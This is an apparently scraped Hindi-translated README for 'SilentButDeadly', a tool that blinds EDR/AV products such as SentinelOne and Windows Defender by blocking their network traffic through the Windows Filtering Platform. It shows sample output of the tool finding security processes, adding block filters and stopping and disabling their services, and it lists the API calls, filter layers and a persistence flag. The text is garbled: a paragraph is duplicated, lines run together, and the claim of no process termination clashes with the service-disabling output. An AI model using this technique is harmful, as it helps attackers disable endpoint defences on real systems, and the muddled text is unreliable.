
SilentButDeadly एक नेटवर्क संचार अवरोधक है, जो विशेष रूप से EDR/AV सॉफ़्टवेयर को उनकी क्लाउड कनेक्टिविटी रोककर निष्क्रिय करने के लिए डिज़ाइन किया गया है, जो Windows Filtering Platform (WFP) का उपयोग करता है। यह संस्करण केवल नेटवर्क आइसोलेशन पर केंद्रित है, बिना प्रोसेस समाप्ति के।
SilentButDeadly एक नेटवर्क संचार अवरोधक है जिसे विशेष रूप से EDR/AV सॉफ़्टवेयर को उनकी क्लाउड कनेक्टिविटी रोककर बेअसर करने के लिए डिज़ाइन किया गया है, जो Windows Filtering Platform (WFP) का उपयोग करता है। यह संस्करण प्रक्रिया समाप्ति के बिना केवल नेटवर्क आइसोलेशन पर केंद्रित है।
ब्लॉग: https://ryan.framinan.net/blog/silentbutdeadly
[*] Checking administrative privileges...
[+] Running with Administrator privileges
[#] Press <Enter> to begin EDR enumeration...
CheckTokenMembership() का उपयोग करके प्रशासक विशेषाधिकारों की पुष्टि करता है[*] Scanning for target security processes...
[+] Found SentinelAgent.exe (SentinelOne) - PID: 1234
[+] Found MsMpEng.exe (Windows Defender) - PID: 5678
[*] Total target processes found: 2
[#] Press <Enter> to block network communications...
CreateToolhelp32Snapshot() का उपयोग करके प्रक्रिया स्नैपशॉट बनाता हैPROCESS_QUERY_INFORMATION एक्सेस के साथ प्रक्रिया हैंडल खोलता है[*] Initializing Windows Filtering Platform...
[>] Initializing COM library
[>] Generating WFP provider GUID
[>] Opening WFP engine handle
[+] Windows Filtering Platform initialized successfully
[*] Configuring network filters to block EDR communications...
[>] Processing filters for SentinelAgent.exe (PID: 1234)
[>] Process path: C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgent.exe
[>] Outbound filter added successfully
[>] Inbound filter added successfully
[+] Network communication blocked for SentinelAgent.exe
[+] Communication blocking established for 2 processes
प्रत्येक EDR प्रक्रिया के लिए:
QueryFullProcessImageNameW() का उपयोग करके पूर्ण प्रक्रिया इमेज पथ प्राप्त करता हैFwpmGetAppIdFromFileName0() का उपयोग करके पथ को WFP AppID ब्लॉब में परिवर्तित करता हैFWPM_LAYER_ALE_AUTH_CONNECT_V4 (आउटगोइंग कनेक्शन ब्लॉक करता है)FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 (इनकमिंग कनेक्शन ब्लॉक करता है)[*] Attempting to disable EDR services...
[>] Processing service: SentinelAgent
[>] Current service state: Running
[>] Attempting to stop service...
[+] Stop signal sent to SentinelAgent
[+] Service stopped successfully
[+] Service SentinelAgent set to disabled
[+] Disabled 2 EDR services
SERVICE_DISABLED में बदलता है=================================================================
OPERATION SUMMARY
=================================================================
[SentinelOne] SentinelAgent.exe - PID: 1234
[Windows Defender] MsMpEng.exe - PID: 5678
Total Processes Found: 2
Network Blocks Applied: 2
WFP Status: Active
=================================================================
[#] Press <Enter> to remove filters and exit...
[*] Removing network blocking rules...
[+] Network blocking rules removed
[*] Operation complete
FWP_ACTION_BLOCKFWPM_CONDITION_ALE_APP_ID (प्रक्रिया-विशिष्ट)FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHTg_EDRTargets ऐरे के माध्यम से आसानी से विस्तार योग्य-v, --verbose: विस्तृत संचालन लॉगिंग सक्षम करें-p, --persistent: प्रोग्राम से बाहर निकलने के बाद फ़िल्टर सक्रिय रखें-h, --help: उपयोग जानकारी प्रदर्शित करें-p फ़्लैग उपयोग न किया जाए)